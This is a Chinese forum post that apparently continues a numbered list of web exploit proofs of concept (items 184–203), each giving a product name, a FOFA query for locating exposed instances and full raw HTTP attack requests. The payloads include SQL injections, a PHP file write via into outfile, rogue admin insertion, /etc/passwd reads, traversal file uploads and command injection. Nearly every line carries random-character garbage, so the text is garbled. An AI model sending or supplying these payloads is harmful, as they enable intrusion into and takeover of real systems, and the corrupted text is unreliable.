: E/ z3 `% r+ B$ g7 eAccept-Charset: utf-8
3 e2 d1 X7 u9 O. q( L3 G: fAccept-Encoding: gzip, deflate
6 x1 d7 J8 N3 D1 v4 |Connection: close
7 l/ S/ N5 D* p8 ]! Q9 e' }+ e! I4 I2 m2 N7 H$ ^: K! M

) y2 c( [1 U6 G5 `3 T0 j( A184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加; W/ Z9 }+ u* ^. o- R4 z+ Y
FOFA:server="SunFull-Webs"5 f4 R, u& I% r: C9 p
POST /soap/AddUser HTTP/1.1
2 G' i% b' ^; f6 J2 X% r7 n- C4 nHost: your-ip
5 G! C  v8 q/ l, C$ m8 ^Accept-Encoding: gzip, deflate
. ]# Z) G. F+ D3 ]3 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 R4 P- p+ D5 U% bAccept: application/xml, text/xml, */*; q=0.01) @% I, S( H9 `" w1 a. f: I
Content-Type: text/xml; charset=utf-8
+ H# _- \$ {2 z. @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ z5 h9 ]+ M8 r  \: `0 N+ y) i  Z
X-Requested-With: XMLHttpRequest, K; Y" |& V2 c% S
& N. D/ t# e+ {" M

4 T' i( V6 n0 y% Einsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'); ]: w( m2 ~- H4 m- q9 Q! j
% d+ B/ o. {7 T0 a

& k; x9 {* ], J185. 瑞友天翼应用虚拟化系统SQL注入6 G2 G8 t0 E9 ]+ P7 B* R8 `
version < 7.0.5.13 P" ~( r+ P9 P# y1 i
FOFA:app="REALOR-天翼应用虚拟化系统"
) X. t! @9 d8 B3 i% [4 d/ wGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1: I& g+ g& Q# @4 P7 h
Host: host
# e- ^* J. Q% A9 {% m* r9 I( y1 |5 Y8 o2 q+ @

9 u% _2 w, Y5 m* U4 l. G. B( `" a186. F-logic DataCube3 SQL注入/ F3 w$ O& F* c# H, ?$ q
CVE-2024-317501 }3 l. _" c9 v  Y+ _
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
% }" g1 b' J" K, ]5 M- C& KFOFA:title=="DataCube3": l) J( m7 i% E" w
POST /admin/pr_monitor/getting_index_data.php HTTP/1.16 \0 c8 c# J6 `+ ^
Host: your-ip6 h% \  a7 @0 ]0 j1 m/ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. S3 W2 c, z" [3 |" u) q$ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8/ D& J; F  v. e. `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% Z( p) U* W; ?Accept-Encoding: gzip, deflate
, a5 R, \; U0 h+ Y$ g  dConnection: close# l# f5 [- q  h- s
Content-Type: application/x-www-form-urlencoded3 P* H1 j% _) z0 v3 U: h5 `
. M6 ^' T  y% I1 M
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
% }9 Y2 U! _9 M4 c- k/ ^( Y7 {) }
* n+ c4 I# [3 E# z& D* x' b+ q9 n1 ~0 c3 V9 v, K7 ]
187. Mura CMS processAsyncObject SQL注入
! u1 {/ a' `, {( {3 i5 i( D- lCVE-2024-32640! C+ X# s4 e' ^8 E+ o
FOFA:"Mura CMS"
0 a  |; s, D8 z1 M8 I$ L) JPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.10 g9 y5 ?4 t. ]" r
Host: your-ip
4 p+ Q; Y  K* ]( g; {" NContent-Type: application/x-www-form-urlencoded
5 V3 R! z1 C3 o! F" o0 C
/ D8 b1 D: }$ P7 U( _. c! o1 J) c% ]: `: E4 v$ j
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1) y% w, ^8 O, Y5 ~- V, G. C$ F" K
. O3 r/ L7 s9 s6 _% }
& ^4 U! s' C) w, ^: _: V
188. 叁体-佳会视频会议 attachment 任意文件读取
; s6 j  B7 _* o# p. @version <= 3.9.7
: A. p7 }9 V* z) x/ p" jFOFA:body="/system/get_rtc_user_defined_info?site_id"
4 A* u2 \) G$ [3 [% `$ R0 Y5 IGET /attachment?file=/etc/passwd HTTP/1.1) N3 O" ~7 d$ ^' {2 k) S2 [2 E7 c
Host: your-ip3 y3 `. }. P) B  A! d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ p$ I: x9 x" |& ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% ~% C9 P, N5 @9 D; D, E* h
Accept-Encoding: gzip, deflate
# B' [' ]0 K9 Q& {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8' _4 V0 F3 y; w2 I6 f
Connection: close2 G$ L4 n8 ^6 @

) s4 a5 Q6 A0 L- c3 [6 W( R9 n. A, t: F/ r: ^, X. F% ]
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
8 B$ B- s+ {; a0 ^. `$ FFOFA:app="LANWON-临床浏览系统"! ?) U% ^2 n1 O( E8 r
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
- |% T( |2 Y' ]Host: your-ip; G( q3 S7 P6 R9 I: ?5 K
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' A5 x4 g8 `) e9 X1 a( \9 k1 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# U1 |/ U8 @  ]- G9 q
Accept-Encoding: gzip, deflate( f: i! H  l+ |" ^' v  S9 M
Accept-Language: zh-CN,zh;q=0.9! D1 r) g# Q+ d# e. ]
Connection: close; f9 v9 w: q4 v7 r. s0 _' p

" z  t+ A! e, q( O' d* x: X9 A1 N9 _+ h8 \$ D3 M) u
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 Y3 j$ f! g8 K! W1 M- [7 OFOFA:title=="短视频矩阵营销系统"* G! ^# U: e) G/ E
POST /index.php/admin/Userinfo/poihuoqu HTTP/2) Z1 K6 |6 i9 e& e% H2 J* _
Host: your-ip" z4 `& V& k4 h( t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
  w9 {* O) o5 q' {( QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ O2 M% i7 Z. E* a+ j
Content-Type: application/x-www-form-urlencoded1 v2 T# X1 }! n+ z: ~: |
Accept-Encoding: gzip, deflate1 V% ^3 N) y; Y
Accept-Language: zh-CN,zh;q=0.9
5 l: ^+ N- Y  v1 c1 K! ]  g3 ]8 f- F! D3 ^  A# D- N- \/ m8 y
poi=file:///etc/passwd& ^; g1 ?( n! n1 t0 w/ v, h' L, Q7 d

" L6 I% d* t# q$ A
3 `: U3 N' \/ Y6 D; Q' J191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
6 S' G) p) `' Z( ^' I5 }, O- mFOFA:body="/CDGServer3/index.jsp"& ^/ A$ y( q$ b6 A* e
POST /CDGServer3/js/../NavigationAjax HTTP/1.1( r5 e6 f! ~# h$ u# }5 ]  C
Host: your-ip/ p* ^9 d5 B" h+ u( X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ v0 A- r% a- H
Content-Type: application/x-www-form-urlencoded) ?  N' m5 ~# p$ \& l/ a4 N

. ?+ }! u9 s5 O, E' o) Ucommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=. e) _1 j( P/ Q. _: z: J

& T8 A3 e4 C' z( g, R  k, f: R6 K( ^
7 u" d% {/ y( b; J" E! V192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
/ v& P) c+ W1 Y3 YFOFA:title="用户登录_富通天下外贸ERP"4 a- H5 K* ~0 J/ ]; p2 f
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
- I8 c+ b& _; v! jHost: your-ip. Q, U8 ~2 M2 z- L6 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 G/ y3 A4 J9 h1 \( d6 \* P& yContent-Type: application/x-www-form-urlencoded( p) a/ z6 H4 `+ A6 H' ^3 ]& E

6 f/ k0 d9 y; o8 ]! z  N1 i5 y! \
, i' o' F9 F# W& m<% @ webhandler language="C#" class="AverageHandler" %>3 C; F& Q7 U8 x* S4 m4 P( g4 P
using System;
" ^) S5 G, C+ e' [9 i3 Wusing System.Web;
8 `( P9 g) w- D7 V  n/ Wpublic class AverageHandler : IHttpHandler3 ?: z& A& S+ }' n, M! p* t
{' Y) o$ Q, o3 u" ?# I
public bool IsReusable) c! Q8 t, S, w" F+ [
{ get { return true; } }6 Z# N: K3 R/ N
public void ProcessRequest(HttpContext ctx)
% a- E7 H+ z6 k, K{
( B, E) N4 h6 t5 [ctx.Response.Write("test");! X6 _) w9 F& L* j9 M8 ^
}) H% |" b+ @) S- @# P
}" y" ]7 y3 H5 e  r. O! x

- ~5 |5 }, P+ _7 i9 l# i- K3 Y: ?6 Q' R, y7 D/ b+ S; o% Y
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行' ^% f+ P& r* J
FOFA:body="山石云鉴主机安全管理系统"
2 d" h- K% J8 LGET /master/ajaxActions/getTokenAction.php HTTP/1.13 B8 B6 i$ f3 K8 T( g
Host:
- E6 ~8 E' h/ C$ f6 O# R" x3 yCookie: PHPSESSID=2333333333333;' ]0 c  c8 N+ m* J! I
Content-Type: application/x-www-form-urlencoded0 g, F. v9 J* I# M) U  d
User-Agent: Mozilla/5.00 c! W* C; W# |9 S+ |; ~5 h4 d* i# x
+ ^, B! I% v% z8 o& Q3 r

7 F, a2 p' S  ^4 p  jPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
! p3 U. _( N$ l$ W/ ~/ qHost:
& _0 O  O6 n; L8 T7 ^( g# N' V- fUser-Agent: Mozilla/5.0! c/ V! v; G1 N6 ^$ W& ^+ W
Accept-Encoding: gzip, deflate3 r. e: |! ]+ R- Y
Accept: */*
1 [! i! I. D) i# CConnection: close( M( n4 h7 A4 l# b+ j, D& }" m
Cookie: PHPSESSID=2333333333333;
6 r6 K( ^% q) h% q- _  hContent-Type: application/x-www-form-urlencoded# Q( j  |& q3 W" ~3 N# W- V2 s
Content-Length: 84. I. n  D! s, u: n' c

0 L, K' D: a7 W' n3 Dparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
( k# F7 M  D+ |% [, E2 S" Y& h' y/ M' J1 s& L! r( [6 S

4 V& D9 K+ p" _1 B4 p# x' lGET /master/img/config HTTP/1.1
1 `8 [3 C, f+ `- a# L- S4 gHost:7 p8 m' Z6 {) _/ g- R
User-Agent: Mozilla/5.0
) n; L1 W6 _. q, w' p% [5 y6 y  R/ F5 H* t/ `, e+ n( ]

& G: d; v  p) l6 e" e1 \1 M194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传9 V- ?+ o; \3 ]! j9 k
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在( x8 a" x. K2 m7 e! s0 V

6 C* \" }, ?& SPOST /servlet/uploadAttachmentServlet HTTP/1.1
* [' q) {. c4 z$ \2 s" `Host: host
+ A& y' s0 t: `# P" }1 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
# E3 _% `0 c- Y6 z4 {& qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; A/ b; c6 I$ K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& O2 Z, H: H* ~# X. _; DAccept-Encoding: gzip, deflate/ d) N* O& ~, V0 f- S, ~% Y
Connection: close
7 h& R3 R6 x- M* i1 n  _7 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
/ N/ ?3 D  Y. c" r2 N' z# `; K------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 x# I1 z6 n& s! ]: |" z
0 G1 |$ t* Y  Y7 Z, O
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
3 a0 A/ J. c2 TContent-Type: text/plain5 [$ i' w7 ^! R1 b
<% out.println("hello");%>
- Q) D/ e" F* s------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 h! ]6 A- z* r9 r1 j* F( mContent-Disposition: form-data; name="json"
! p  H7 U0 T% m& W$ e3 t' T {"iq":{"query":{"UpdateType":"mail"}}}4 _" }% Q% h0 ?. |
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
$ b/ B( C" ^. H. u- U* |2 v" g! @! V6 E- ^: ?3 V

( S6 s: C- m7 g* R" \4 O/ n& J% R195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
# H  ]  o3 k7 U5 _! l0 p' MFOFA:title=="飞鱼星企业级智能上网行为管理系统
: M8 c8 A: J6 E3 S! H- LPOST /send_order.cgi?parameter=operation HTTP/1.1
* F# Z2 _3 c0 }9 D( iHost: 127.0.0.1+ ]- R; ~6 C  L9 Q5 ?6 P
Pragma: no-cache, `2 Z5 C+ y6 J; v- W8 L- A
Cache-Control: no-cache
- ]" B0 _6 T, v- oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( I& S# B2 k  C  x' b! g7 UAccept: */** O8 M" o2 x2 c& X8 J
Accept-Encoding: gzip, deflate
1 V' r; X% I9 ]- ?! [Accept-Language: zh-CN,zh;q=0.9/ O+ ~! L1 Y% a! T
Connection: close
! l; w2 a+ d8 a; sContent-Type: application/x-www-form-urlencoded
5 J6 {1 Q& i8 N4 a7 UContent-Length: 68
7 D& a6 [; Q' h3 B& B
$ N. \. Y, n5 F: G{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
* B$ N! U9 R+ {! }
4 ~, z" b& o$ c: }
$ m! x. B+ h* ~196. 河南省风速科技统一认证平台密码重置- ]2 J3 H2 H4 F8 r# O
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"/ ?- C  \. n( j% \- c/ u
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
0 t# Q& _8 y8 s; R- ]* C* w4 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' `# V  o$ G- u: g! JContent-Type: application/json;charset=UTF-8( t" f( J! G: N0 h# k: v
X-Requested-With: XMLHttpRequest
6 Q  r- s$ m; L4 h' c$ a$ k$ OHost:
2 _* }. l/ R' x5 I) fAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
& u- [, }5 M0 l5 G5 M; f. y+ T6 vContent-Length: 45
8 j9 C" h; i9 SConnection: close% ?+ b0 Y5 s7 F  N' W
9 y- o7 c3 y4 T" i7 c' {& z8 _
{"xgh":"test","newPass":"test666","email":""}
* V- s; r8 p  F
+ y$ o( `7 F4 ^) F8 i: R! O% ?+ G7 N+ [
1 i" T( P9 _' |6 X* P2 }. k5 @) n! Y: w( S2 t
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入8 |+ m0 L4 |! U* X2 ~: k# E( p
FOFA:app="浙大恩特客户资源管理系统"
' W0 e7 E; j6 h* gGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.15 Q: D/ n# B( ?8 L
Host:0 O; g4 m( _. H& k. {5 W" f7 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36, m' ^$ S5 E! K8 X
Accept-Encoding: gzip, deflate* j. F# s- I# w9 T* S4 c# ]* S( e
Connection: close9 N9 J2 l( M4 |3 I6 t5 X- f
8 V2 I: X% O1 D( L

% J6 P) o5 i' @; D# J+ \+ c7 N6 B+ g4 O1 ]; o7 N0 U
198.  阿里云盘 WebDAV 命令注入' I/ c$ E+ c  e7 d! R
CVE-2024-29640) k" H+ Z0 G- }6 f7 J) t8 f8 \
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
2 E4 c* O, e5 @Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64: S* a5 M. j% X# M
Accept: */*0 h8 D0 E" r  c# U0 V
Accept-Encoding: gzip, deflate
, A, }  @4 H0 _2 h, ~' N' ^% sAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
% x' i3 l. W- u' _, ?( J0 ~8 vConnection: close
( l4 k( s6 t1 q9 ]# p1 z& r8 r2 s/ b- b  k. @& I8 J

% j0 t) r# u* E/ k3 p199. cockpit系统assetsmanager_upload接口 文件上传1 v; G. v) b$ c7 j! |

, L6 Z. x# n! x3 N5 j1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
2 ^0 A9 N, v- [& C7 _GET /auth/login?to=/ HTTP/1.1# C; t/ Q4 D+ ?2 D
0 t& C# P$ {( I3 A" L3 k: Y5 G
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"6 z; h1 I, C0 }6 ^/ R" \8 Y; a) C
* ]% i7 c, m! l$ A  s
2.使用刚才上一步获取到的jwt获取cookie:
6 R& j& \0 G3 ]& s0 E: U
- o% _8 `1 n: Z! NPOST /auth/check HTTP/1.17 d/ x0 B% p! h
Content-Type: application/json
; d. X; e4 B6 D5 s
' Z2 ?( D8 U+ v/ O- q{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}; R6 p1 n* _& M+ i' H' A2 m

  [3 S3 M; a6 X响应:200,返回值:5 k+ \4 c. T( J: O- N, G
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/2 d7 [( m  N) \
Fofa:title="Authenticate Please!"
2 n2 r. ^5 _( R( z# h# b8 N/ b: h* KPOST /assetsmanager/upload HTTP/1.1) ]; J/ V  u( E" \5 g5 N. }8 j
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# i/ A: Q* x8 v- v) \6 c
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92* s% y8 H2 }# a5 r- Y
! Y5 T* _  u: V# @( Q; I# C
-----------------------------36D28FBc36bd6feE7Fb3* H4 w* f! O5 Q6 s; z, V1 f" k
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
9 B' a+ s5 R. y$ M+ GContent-Type: text/php
( G7 v: B. D9 Z/ m& F! V% j
8 V/ K( L0 o3 e<?php echo "tttt";unlink(__FILE__);?>" u" b+ q) S. B
-----------------------------36D28FBc36bd6feE7Fb3
7 d( R; r) c( j$ S3 ]5 Z6 lContent-Disposition: form-data; name="folder"
' M% e; o' \* x) s1 v4 O
; c4 Y$ _9 w4 r* o( ~-----------------------------36D28FBc36bd6feE7Fb3--2 P+ }/ O" x+ M6 y

! w' j: L! _3 H. Q. r4 ]7 o- r9 }" W* @. [2 E9 V9 g/ h9 [
/storage/uploads/tttt.php* _. j, U+ n$ V4 i0 g0 \
# F' Z  Y& D8 J$ X. J2 S4 o; p
200. SeaCMS海洋影视管理系统dmku SQL注入
9 q3 S- Q. R7 Y$ ~, SFOFA:app="海洋CMS"
: r" F/ P' t3 M6 N9 c* tGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.11 p+ Y; V' r- t* c
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s/ W3 O" R; b. [+ ~% i
Upgrade-Insecure-Requests: 1
  Y# l( E, R" y$ X  ~7 u) `Cache-Control: max-age=0. U. I" v9 s4 j" }& _! @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! v1 q/ m; d' o- [4 C
Accept-Encoding: gzip, deflate# K( b' u  w( X- x8 \
Accept-Language: zh-CN,zh;q=0.9  Z0 F" b% r# X3 c

3 U2 h# a8 g/ a6 g) X
* S/ `  g2 S- Z+ \3 s  s201. 方正全媒体新闻采编系统 binary SQL注入3 |5 G' o. v5 e* ^4 J' f, \
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
# D7 n0 }; L! q* X9 C: b, i$ vPOST /newsedit/newsplan/task/binary.do HTTP/1.1
3 x' y6 C$ F4 r" w7 BContent-Type: application/x-www-form-urlencoded- n, B+ g4 ~7 B" c+ t/ j; s0 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* e# h6 \; Y% H. V4 }" T
Accept-Encoding: gzip, deflate
: {( ^5 T3 X4 qAccept-Language: zh-CN,zh;q=0.9
3 U% {5 u  q0 |  s: X6 C  pConnection: close
! n- m: n: i2 J7 z& V4 }! M6 q2 B( A; x7 O: @( w
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=18 l+ Q6 i7 P0 D3 n
$ p4 i2 c+ O% }( `# O; @& T* n
  i' c3 d2 ^; t) u1 H& m
202. 微擎系统 AccountEdit任意文件上传2 b; d7 D$ {" [: v* N
FOFA:body="/Widgets/WidgetCollection/"
) Z5 [9 }% ?2 n  A获取__VIEWSTATE和__EVENTVALIDATION值! e8 q1 i7 Z5 W; {
GET /User/AccountEdit.aspx HTTP/1.1
5 i1 l. ]& _2 Y/ l! {8 i, [Host: 滑板人之家
6 j4 Q6 E4 y6 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
2 R7 b: H8 t/ }6 NContent-Length: 0
3 y# X2 ~$ }5 D! s, J- l) s6 {7 |; k
  q# q, p' f& }* M/ p8 A
替换__VIEWSTATE和__EVENTVALIDATION值
) G8 k( K# b6 ^POST /User/AccountEdit.aspx HTTP/1.1, V' M7 g( v" ?, J& @& m
Accept-Encoding: gzip, deflate, br
4 {( f. i& @  F& c2 _6 M0 HContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
# r. P/ E. k/ L; e5 S6 {2 a1 V" W  k
$ @6 t. o9 t( R- w. e! [0 Q-----------------------------786435874t38587593865736587346567358735687
5 Y' W  u/ L/ p( O6 ZContent-Disposition: form-data; name="__VIEWSTATE"
% \. {( ~$ o* z) u7 F
0 E6 Z+ j: l* [: P__VIEWSTATE
% b( p# O4 i  ~, \! a, h+ s-----------------------------786435874t38587593865736587346567358735687
9 D% F/ ~( X8 B1 a2 hContent-Disposition: form-data; name="__EVENTVALIDATION"
7 h) E: e: d1 r' N
$ ?3 D  g% ]9 h3 h* w" r__EVENTVALIDATION2 C, l! f' {- G5 O6 S( n3 D
-----------------------------786435874t38587593865736587346567358735687( t' a" b1 u# A* e1 S4 q
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
0 H& K- h4 g% w0 P* RContent-Type: text/plain
! W  M& g. V5 F6 L9 D" {8 K0 l% M
: }4 W( u9 e& G; Z9 B4 }. qHello World!
& A2 t. P$ ?0 B-----------------------------786435874t38587593865736587346567358735687
, m3 [# ^) b( |  p$ |& M+ kContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
5 @, l+ e$ k% P+ c# T
4 `  ^7 f& m* F. s" ]0 ?! U' `1 G上传图片
5 v) h8 b# e7 e( K2 V- P: i, g-----------------------------786435874t38587593865736587346567358735687! [* X* N  N- a8 E# U4 |! f
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
* Q; m4 D3 }, q6 i3 u  m5 v2 D$ B- O5 k! M, |! z% Z! o

  P3 x+ h' }; `* B3 i( X-----------------------------786435874t385875938657365873465673587356871 x! `' F; j' g( v- p
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"- O/ Y- _* E3 w  f
$ P8 a5 t+ @+ M7 j% D' J

. ?$ N0 D: d2 u+ R0 s-----------------------------786435874t38587593865736587346567358735687--
- j- F/ E0 v' K- H8 u- i: J0 h. p1 S; |* Z* i. r6 R* X/ x
) J; `6 z7 }( U- b8 n0 M4 v, K' w
/_data/Uploads/1123.txt" ]. G2 m; q7 X' [

8 D' x0 a- ~2 @2 d+ @203. 红海云EHR PtFjk 文件上传
; G; d6 g7 `9 W. d, J! fFOFA:body="RedseaPlatform"
7 X! ^% t, g% N; U; Z+ c# }' e/ ]POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.14 Y. I3 O- \3 I- L  Z
Host: x.x.x.x/ F  W- W  j1 w4 {8 J
Accept-Encoding: gzip# B# t  @1 U! z8 [: H, W( o1 e& U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 v1 Q# C) ]6 j) A" c  j, VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
9 o* B: L* M# M; O$ o2 o! p3 D& \Content-Length: 210
1 D! L4 P* T! `: r
) J6 A. a+ t! Z, |2 f------WebKitFormBoundaryt7WbDl1tXogoZys4
- M6 w3 K5 ?; M' O% bContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
1 u5 a, G) S( o4 T, [# ^Content-Type:image/jpeg( ~! |- p0 ?  d0 U
1 A1 N/ W$ e3 V6 \- I% g9 N
<% out.print("hello,eHR");%>$ F, Z7 n+ l" d
------WebKitFormBoundaryt7WbDl1tXogoZys4--
7 w0 t  K( @  q5 S. V
2 o/ F7 T. v# U+ N4 c1 |6 {; G
4 W" c1 q1 X. |  M0 g6 X2 s' R3 T

  `6 z2 V% U2 `, c$ {
+ [- `" I/ Q3 l+ B
9 l) c) Q' H- M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表